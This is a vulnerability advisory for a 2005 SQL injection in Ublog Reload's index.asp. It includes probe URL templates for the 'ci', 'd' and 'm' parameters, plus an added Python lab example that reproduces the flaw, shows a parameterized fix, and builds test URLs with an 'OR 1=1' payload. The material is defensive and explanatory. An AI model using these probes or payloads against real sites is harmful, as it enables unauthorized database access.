Ublog Reload index.asp Multiple Variable SQL Injection

2005-06-19T06:55:44
ID OSVDB:17385
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2005-06-19T06:55:44

Description

Vulnerability Description

Ublog Reload contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.asp' script not properly sanitizing user-supplied input to the 'ci', 'd' and 'm' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Solution Description

No workarounds are known. Uapplication has released a patch that addresses this vulnerability; see the Vendor Specific Solution URL under References below.

Short Description

Ublog Reload contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.asp' script not properly sanitizing user-supplied input to the 'ci', 'd' and 'm' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/UblogReload/index.asp?ci=[SQL INJECT][id]&s=category
http://[target]/UblogReload/index.asp?d=[id][SQL Inject]&m=[month]&y=[year]&s=day
http://[target]/UblogReload/index.asp?m=[month][SQL Inject]&y=[year]&s=month
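The advisory does not show the affected ASP source, so the following is an added example, not Ublog Reload's own code: it assumes the flaw is plain string concatenation of the 'ci', 'd', 'm' and 'y' values into the WHERE clause, reproduces that against a constructed SQLite table (the real schema is unknown), and puts a hardened version beside it that allow-list validates each value as an integer and binds it as a query parameter. It also builds the three probe URLs from the testing notes above with a boolean payload appended. The table, column names and hostname are assumptions.

```python
import sqlite3
from urllib.parse import urlencode

# Constructed sample data. The real Ublog Reload schema is not known; this table
# is an assumption that only needs a category, a date and a draft flag.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(
            id INTEGER PRIMARY KEY, category_id INTEGER,
            day INTEGER, month INTEGER, year INTEGER,
            title TEXT, draft INTEGER);
        INSERT INTO posts VALUES (1, 1, 17, 6, 2005, 'public post, category 1', 0);
        INSERT INTO posts VALUES (2, 2, 18, 6, 2005, 'public post, category 2', 0);
        INSERT INTO posts VALUES (3, 2, 19, 6, 2005, 'unpublished draft',        1);
    """)
    return conn

def vulnerable_query(conn, params):
    """Assumed flawed behaviour: ci/d/m/y are pasted into the WHERE clause verbatim."""
    s = params.get("s", "")
    base = "SELECT id, title FROM posts WHERE draft = 0"
    if s == "category":
        sql = base + " AND category_id = " + params.get("ci", "")
    elif s == "day":
        sql = (base + " AND day = " + params.get("d", "")
               + " AND month = " + params.get("m", "")
               + " AND year = " + params.get("y", ""))
    elif s == "month":
        sql = (base + " AND month = " + params.get("m", "")
               + " AND year = " + params.get("y", ""))
    else:
        return []
    # 'ci=1 OR 1=1' turns the predicate into (draft = 0 AND category_id = 1) OR 1=1,
    # which returns every row, the unpublished draft included.
    return conn.execute(sql).fetchall()

def as_int(value, lo, hi):
    """Allow-list check: digits only and inside a sane range, otherwise reject."""
    if not isinstance(value, str) or not value.isdigit():
        raise ValueError("non-numeric parameter: %r" % (value,))
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError("parameter out of range: %d" % n)
    return n

def hardened_query(conn, params):
    """Same three views, but every value is validated and bound as a parameter."""
    s = params.get("s", "")
    base = "SELECT id, title FROM posts WHERE draft = 0"
    if s == "category":
        sql = base + " AND category_id = ?"
        args = (as_int(params.get("ci", ""), 1, 10**6),)
    elif s == "day":
        sql = base + " AND day = ? AND month = ? AND year = ?"
        args = (as_int(params.get("d", ""), 1, 31),
                as_int(params.get("m", ""), 1, 12),
                as_int(params.get("y", ""), 1990, 2100))
    elif s == "month":
        sql = base + " AND month = ? AND year = ?"
        args = (as_int(params.get("m", ""), 1, 12),
                as_int(params.get("y", ""), 1990, 2100))
    else:
        return []
    return conn.execute(sql, args).fetchall()

def probe_urls(base_url, payload):
    """The three request shapes from the testing notes, payload appended to the injectable value."""
    return [
        base_url + "?" + urlencode({"ci": "1" + payload, "s": "category"}),
        base_url + "?" + urlencode({"d": "18" + payload, "m": "6", "y": "2005", "s": "day"}),
        base_url + "?" + urlencode({"m": "6" + payload, "y": "2005", "s": "month"}),
    ]

if __name__ == "__main__":
    conn = make_db()
    honest = {"s": "category", "ci": "1"}
    hostile = {"s": "category", "ci": "1 OR 1=1"}
    print("vulnerable, honest :", vulnerable_query(conn, honest))
    print("vulnerable, hostile:", vulnerable_query(conn, hostile))
    print("hardened,   honest :", hardened_query(conn, honest))
    try:
        hardened_query(conn, hostile)
    except ValueError as e:
        print("hardened,   hostile: rejected:", e)
    # Hostname is a placeholder; replace it with the host under test.
    for u in probe_urls("http://target.example/UblogReload/index.asp", " OR 1=1"):
        print(u)
```

When testing, compare the response for the honest request against the `OR 1=1` variant: a larger or different result set on the second request is the signal that the value reached the query unquoted. The hardened version rejects before the query is built, so the error path is a validation failure rather than a database error, and nothing attacker-controlled is ever concatenated into SQL.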

References:

Vendor URL: http://www.uapplication.com/
Vendor Specific Solution URL: http://www.uapplication.com/news_details.asp?id=8
Security Tracker: 1014245
Secunia Advisory ID: 15747
Related OSVDB ID: 17387
Related OSVDB ID: 17386
Other Advisory URL: http://echo.or.id/adv/adv18-theday-2005.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0153.html
ISS X-Force ID: 21024
CVE ID: CVE-2005-2009
Bugtraq ID: 13991